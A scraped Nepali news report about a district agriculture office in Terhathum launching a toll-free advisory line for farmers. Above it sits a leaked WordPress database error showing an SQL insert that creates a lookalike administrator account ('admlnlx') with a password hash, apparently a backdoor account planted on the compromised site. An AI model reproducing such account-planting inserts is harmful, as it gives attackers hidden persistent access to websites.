WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BixLrAVw5BKIR6fZaXoEHl6YYiUUs50', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 20:02:12', '', 'admlnlx', 'admlnlx')
तेह्रथुम,माघ २ –
जिल्ला कृषि विकास कार्यालयले दुर्गम र दुरदराजका किसानलाई कार्यालयबाटै प्राविधिक परामर्शका लागि टोल ‘फ्रि’ नम्बरबाट सेवा दिन थालेको छ ।
कृषि प्राविधिकको सङ्ख्या थोरै रहेको र प्रत्येक किसानसम्म पुगेर सेवा दिन अफ्ठ्यारो परेकाले किसानको सजिलोका लागि टोल फ्रि नम्बर सञ्चालनमा ल्याएको वरिष्ठ कृषि विकास अधिकृत रोहिणीराज घिमिरेले बताउनुभयो ।
किसानले फोन गर्दा पैसा नलाग्ने हुँदा आफ्नो खेतीबालीमा सामान्य प्रकृतिका रोगकीरा नियन्त्रणका लागि २४ सै घन्टा प्राविधिकसँग सम्पर्क गर्नसक्ने कार्यालयले जनाएको छ ।
कार्यालयको १६६०–२६४६००० टोलफ्री नम्बरमा सम्पर्क गरेर कृषि प्राविधिकसँग सल्लाह लिन सकिने भएको छ । किसानले एउटा टेलिफोन नम्बरबाट १५ मिनेटसम्म निःशुल्क कृषि प्राविधिकसँग समस्या र गुनासा राख्न पाउने कार्यालयले जनाएको छ । – रासस